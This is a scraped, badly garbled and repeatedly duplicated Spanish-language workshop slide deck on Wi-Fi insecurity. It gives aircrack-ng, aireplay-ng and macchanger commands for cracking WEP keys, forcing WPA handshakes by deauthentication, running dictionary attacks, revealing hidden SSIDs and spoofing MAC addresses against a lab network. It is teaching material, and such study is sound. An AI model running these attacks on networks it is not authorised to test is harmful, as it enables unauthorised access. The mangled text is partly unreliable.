WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
